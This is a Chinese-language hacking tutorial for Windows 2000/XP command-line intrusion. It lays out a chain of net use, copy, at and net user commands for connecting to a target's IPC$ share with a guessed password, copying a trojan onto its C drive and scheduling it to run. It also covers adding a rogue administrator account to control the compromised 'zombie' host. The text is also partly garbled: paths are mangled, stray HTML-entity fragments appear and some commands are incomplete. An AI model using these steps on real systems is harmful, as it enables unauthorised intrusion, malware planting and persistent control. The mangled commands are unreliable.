黑客必学之网络命令.docx

1、黑客必学之网络命令要学习网络攻击，首先我们必须学习一些基础的网络命令，我们所谓的基础命令其实也就是WIN 2K，WIN XP系统下的一些DOS命令，这个命令都又CMD.exe来完成 概念部分： （1）2000、XP下的CMD与98的MS-DOS的不同之处： cmd.exe叫命令提示符他与98下的MS-DOS是不一样的，所以我们不能将他混为一谈，但是我们却可以用CMD.exe来执行很多DOS命令，例如：dir、cd、del等等！ （2）CMD下的内部命令与外部命令的不同： CMD下的内部命令就是指：我们可以直接在CMD下就可以执行的命令，例如：telnet、ftp、dir、cd、等等，你可以在C

2、MD下输入help进行查看,外部命令呢，就是cmd下不能直接运行的命令，（例如大家常用的nc）他需要在CMD下切换到他（NC）做在的目录你才能运行NC及NC的命令 实操部分： (一)：常用*防护命令： Net 、telnet 、at、copy、ftp、finger、del 一些常用的Net命令与例子： （1）建立IPC连接的命令 Net use /IP/ipc$ “” /user:username 例如： Net use /127.0.0.1/ipc$ 123456 /user :administrator 这个命令的意思就是与用户名为adminidtrator用户密码为123456的主机12

3、7.0.0.1建立ipc$空连接 (2) 删除IPC$空连接 Net use /ip /del 例如： Net use /127.0.0.1 /del 删除与主机127.0.0.1已经建立的Ipc$连接 (3) 启动关闭服务： Net start /查看已经开启的服务 Net start servername Net stop servername 例如： Net start telnet /开启telnet服务 Net stop telnet /关闭telnet服务 (4)启动关闭共享 Net shate ipc$Content$nbsp; /开启ipc$默认共享 Net share ipc

4、$ /del /关闭ipc$默认共享 Net share c=c:/ /完全共享c盘 Net share d=d:/ /删除完全共享的d盘 (4) 映射硬盘 Net use z: /ip/c$ 例如： Net use z: /127.0.0.1/c$Content$nbsp; /把127.0.0.1的C盘映射成本机的z盘 说明：映射成功后，你在我的电脑里面里面就会多出一个硬盘Z，其实Z就是127.0.0.1的C盘！ Net use z: /del /断开映射 *中的作用：把对方的硬盘映射过来以后我们就能直接复制文件到对方的硬盘下面了 成功实现的条件：必须与对方建立ipc$连接 (5) 远程复制

5、文件_Copy Copy e:/3389.exe /127.0.0.1/c$Content$nbsp; /将本地的E盘下的3389.exe这个文件copy到对方系统的C盘根目录下 Copy在*中的作用：把本地文件复制到对方硬盘 Copy复制成功所需的条件：必须与主机建立ipc$连接 (6) 查看远程系统的时间 Net time /IP Net time /127.0.0.1 /查看远程主机127.0.0.1的本地时间 作用：得到对方时间好为自己计划任务种下木马做准备 (7) 远程运行程序 At /ip time server.exe At /127.0.0.1 12:30 c:/server.

6、exe /让主机在中午12:30分运行我们已经复制到他C 盘根目录下的木马server.exe 在*中作用：这样我们就可以用我们的木马服务端来连接我们木马，更好的使用图形方式来控制肉鸡 （8）添加管理员帐号： Net user username 1234 /add /添加一个密码为1234名字为 username的用户 Net localgroup administrators juntuan /add /把username这个用户添加到管 理员组 注意：有些系统的管理员组不是administrators你要根据实际情况来改，不过99.9%的系统的管理员组还是administrators的。

7、修改用户密码： Net user username 1234 /把用户username的密码修改成1233。（9）远程登陆主机_telnet telnet IP port 例如：telnet 127.0.0.1 1234 /连接登陆127.0.0.1的1234端口 （当目标主机的端口是默认的23的时候我们不需要+端口即：telnet IP 就好） （10）传输文件命令_ftp 其实这个我个人觉得用途不大，毕竟当你拿到了FTP密码之后你可以用flashftp或者cutftp有一个图形截面的交互如何不好呢？ 首先在CMD里面输入ftp 然后输入：open IP port 例如：open 127.0

8、.0.1 1234 /连接登陆127.0.0.1的1234端口 如何开启windows系统自带的ftp服务： Net start msftppsvc (11) 查看文件夹的属性_cacls Cacls xiaod /查看xiaod这个文件夹的属性 参数说明：F：（完全控制）R：（只读）C：（允许更改）W：（允许写入）N：（没有任何权限） (12) 删除文件_del Del是用来删除文件命令 首先进入你想删除的文件的目录 Del xiaod.txt /删除xiaod.txt这个个文件 Del xiaod.txt /f /强制删除xiaod.txt这个个文件（当该文件无法正常删除的时候使用该命令）

9、 (13) finger命令 Finger是一个信息刺探命令一般在对方开启了79端口时命令使用 Finger l user computer 参数详解： -l 用长列表格式显示消息 User:指定用户的信息 成功实现的条件：对方必须安装tcp/ip协议 (14)：文件写入命令_echo: Echo 你好 index.htm /用你好来覆盖index.htm的内容 Echo 你好 index.htm /将“你好”添加到index.htm （15）：写入注册表文件_regedit Regedit /s filename.reg /s是写入参数 (16)：端口映射_chgport Chgport 3=5 /将端口3映射到5 Chgport /d* /删除所有端口映射 (17)：文件映射_subst Subst b:/ c:/winnt /这个时候当你访问硬盘B的时候你就是访问了 c:/winnt目录 (18)：查看当前正在使用的帐号： Query session /查看帐号 (19)：踢掉指定用： Logoff id /注意ID，是在用query session查看到的用户的id而不是用户名。 (20)：发送消息给某用户或者内网主机 Net send hostname or /IP message 例如：net send xiaod or /127.0.0.1 hello